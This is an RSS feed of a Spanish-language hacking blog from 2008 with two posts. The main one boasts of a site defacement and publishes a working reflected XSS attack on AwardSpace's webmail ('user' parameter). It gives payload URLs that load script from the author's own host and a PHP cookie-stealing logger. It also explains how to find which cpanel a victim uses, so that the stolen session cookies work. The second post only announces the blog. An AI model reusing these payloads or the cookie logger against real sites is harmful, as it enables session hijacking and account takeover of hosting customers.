<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>KeyNet Weblog</title>
	<atom:link href="http://fsecurity.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://fsecurity.wordpress.com</link>
	<description>Más allá de la seguridad informatica.</description>
	<lastBuildDate>Sun, 06 Apr 2008 23:14:25 +0000</lastBuildDate>
	<language>es</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='fsecurity.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>KeyNet Weblog</title>
		<link>http://fsecurity.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://fsecurity.wordpress.com/osd.xml" title="KeyNet Weblog" />
	<atom:link rel='hub' href='http://fsecurity.wordpress.com/?pushpress=hub'/>
		<item>
		<title>0day en AwardSpace.com</title>
		<link>http://fsecurity.wordpress.com/2008/04/06/0day-en-awardspacecom/</link>
		<comments>http://fsecurity.wordpress.com/2008/04/06/0day-en-awardspacecom/#comments</comments>
		<pubDate>Sun, 06 Apr 2008 23:14:25 +0000</pubDate>
		<dc:creator>fsecurity</dc:creator>
				<category><![CDATA[Bug's]]></category>

		<guid isPermaLink="false">http://fsecurity.wordpress.com/?p=4</guid>
		<description><![CDATA[Voy a publicar el Bug con el cual cometí el deface a rooteams hecho famoso por mi en este Topic: http://remoteexecution.org/foro/index.php?topic=2553 . lo encontramos con syndr0me la noche del sábado pasado aproximadamente primero dudábamos un poco en como explotarlo o si funcionaria pero convidado con otra particularidad en el sistema de AwardSpace lo hace 100% [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fsecurity.wordpress.com&amp;blog=3398787&amp;post=4&amp;subd=fsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Voy a publicar el Bug con el cual cometí el deface a rooteams</p>
<p>hecho famoso por mi en este Topic:</p>
<p><a href="http://remoteexecution.org/foro/index.php?topic=2553" target="_blank">http://remoteexecution.org/foro/index.php?topic=2553 .<br />
</a></p>
<p>lo encontramos con syndr0me la noche del sábado pasado aproximadamente</p>
<p>primero dudábamos un poco en como explotarlo o si funcionaria pero convidado con otra particularidad</p>
<p>en el sistema de AwardSpace lo hace 100% explotable:</p>
<p>el Bug de XSS se encuentra en los Paneles de WebMail.</p>
<p>afecta tanto a las cuentas WebMail como a las cuentas de Hosting</p>
<p>se ubica en el path /mail2/ de los cpanels de AwardSpace, el script se llama <strong><span class="comment">IlohaMail</span></strong></p>
<p><a href="https://cp1.awardspace.com/mail2/" target="_blank">https://cp1.awardspace.com/mail2/</a></p>
<p>la variable vulnerable : ?user=</p>
<p>que podemos usar para colar codigo Html así :</p>
<p><a href="https://cp1.awardspace.com/mail2/source/index.php?user=&quot;&gt;&lt;h1&gt;Www.F-security.Com.Ar&lt;/h1&gt;" target="_blank">https://cp1.awardspace.com/mail2/source/index.php?user=&#8221;&gt;&lt;h1&gt;Www.F-security.Com.Ar&lt;/h1&gt;</a></p>
<p>(: ahí todo dicho con un poco de creatividad :</p>
<p><a href="https://cp1.awardspace.com/mail2/source/index.php?user=&quot;&gt;&lt;script language=JavaScript type=text/javascript src=http://f-security.com.ar/knet.js&gt;&lt;/script&gt;" target="_blank">https://cp1.awardspace.com/mail2/source/index.php?user=&#8221;&gt;&lt;script language=JavaScript type=text/javascript src=http://f-security.com.ar/knet.js&gt;&lt;/script&gt;</a></p>
<p><a href="https://cp1.awardspace.com/mail2/source/index.php?user=&quot;&gt;&lt;h1&gt;Www.F-security.Com.Ar&lt;/h1&gt;" target="_blank"><img class="aligncenter" src="http://img247.imageshack.us/img247/341/bug1ch1.png" alt="" /></a></p>
<p>teniendo knet.js de contenido  alert(&#8220;Vulnerable:\n&#8221;+document.cookie)</p>
<p>lo que hice en el vídeo fue direccionar a un archivo .php que guardaba los pedidos get en un archivo</p>
<p>( guardmela_cookies.txt )</p>
<p>contenido del archivo php:</p>
<p>&lt;?<br />
$cookie=$_GET[c];<br />
$fp=fopen(&#8216;public.txt&#8217;,'a&#8217;);<br />
fwrite($fp,&#8221;\n&#8221;.&#8217;Cookie:&#8217;.&#8221;\n&#8221;.htmlentities($cookie).&#8221;\n&#8221;.&#8217;====================================================&#8217;.&#8221;\n&#8221;);<br />
fclose($fp);<br />
header(&#8220;Location:http://www.google.com/&#8221;);<br />
?&gt;</p>
<p>lo demas a su imaginación.</p>
<p>un pequeño detalle :</p>
<p>si a la víctima a robar usa un número de cpanel distinto, el robo de cookies no tendría efecto.</p>
<p>por logica necesitamos saber de alguna manera en que cpanel se aloja la victima, yo lo encontre (:</p>
<p>se hace así :</p>
<p>nos dirigimos a <a href="http://www.awardspace.com/login.html" target="_blank">http://www.awardspace.com/login.html</a></p>
<p>y colocamos el supuesto user de la web y una contraseña cualquiera</p>
<p>si es correcto el user nos redirigira al cpanel donde se hostea <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>EJ: pongan.   user:rooteam2 pass:knet</p>
<p>y veran que los redirige al cpanel numero 8</p>
<p>entonces nos dara la posibilidad de crear nuestro xss personalizado para el cpanel webmail número 8</p>
<p>algunas herramientas para este xss ONLINE:</p>
<p>www.f-security.com.ar/public.js</p>
<p>www.f-security.com.ar/public.php</p>
<p>www.f-security.com.ar/public.txt</p>
<p>Webs vulnerables:</p>
<p><a href="http://www.google.com.ar/search?hl=es&amp;q=related%3Aawardspace.com&amp;btnG=Buscar&amp;meta=" target="_blank">http://www.google.com.ar/search?hl=es&amp;q=related%3Aawardspace.com&amp;btnG=Buscar&amp;meta=</a></p>
<p>incluidos zettahost y hostsecure <img src='http://s1.wp.com/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Saludos</p>
<p>Knet</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/fsecurity.wordpress.com/4/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/fsecurity.wordpress.com/4/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fsecurity.wordpress.com/4/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fsecurity.wordpress.com/4/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fsecurity.wordpress.com/4/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fsecurity.wordpress.com&amp;blog=3398787&amp;post=4&amp;subd=fsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fsecurity.wordpress.com/2008/04/06/0day-en-awardspacecom/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0dc81213284ec1c041576907e192bb76?s=96&#38;d=identicon" medium="image">
			<media:title type="html">fsecurity</media:title>
		</media:content>

		<media:content url="http://img247.imageshack.us/img247/341/bug1ch1.png" medium="image" />
	</item>
		<item>
		<title>Apertura del Blog.</title>
		<link>http://fsecurity.wordpress.com/2008/04/06/apertura-del-blog/</link>
		<comments>http://fsecurity.wordpress.com/2008/04/06/apertura-del-blog/#comments</comments>
		<pubDate>Sun, 06 Apr 2008 22:11:59 +0000</pubDate>
		<dc:creator>fsecurity</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://fsecurity.wordpress.com/?p=3</guid>
		<description><![CDATA[Bueno entre idas y venidas en mis horarios, y mi poco tiempo online en el foro de RemoteExecution. opte por abrir un WebBlog junto con mi amigo bOer, donde de ahora publicaremos cada uno por separado info relacionada con la Seguridad Informática,  Programación , Hacking , Deface en general ( solo que a nuestro estilo [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fsecurity.wordpress.com&amp;blog=3398787&amp;post=3&amp;subd=fsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Bueno entre idas y venidas en mis horarios, y mi poco tiempo online en el foro de RemoteExecution.</p>
<p>opte por abrir un WebBlog junto con mi amigo bOer, donde de ahora publicaremos cada uno por separado</p>
<p>info relacionada con la Seguridad Informática,  Programación , Hacking  , Deface</p>
<p>en general ( solo que a nuestro estilo ).</p>
<p>en este www.f-security.com.ar !! me limitare a publicar metodos, bugs, codes hechos por mi,</p>
<p>aunque no descarto la posibilidad de que si quieren enviarme alguna entrada, code, o metodo suyo</p>
<p>para que publique lo hagan a:</p>
<p>keynet.security@gmail.com</p>
<p>Gracias por su visita.</p>
<p>Saludos</p>
<p>Knet.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/fsecurity.wordpress.com/3/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/fsecurity.wordpress.com/3/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fsecurity.wordpress.com/3/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fsecurity.wordpress.com/3/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fsecurity.wordpress.com/3/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fsecurity.wordpress.com&amp;blog=3398787&amp;post=3&amp;subd=fsecurity&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fsecurity.wordpress.com/2008/04/06/apertura-del-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0dc81213284ec1c041576907e192bb76?s=96&#38;d=identicon" medium="image">
			<media:title type="html">fsecurity</media:title>
		</media:content>
	</item>
	</channel>
</rss>
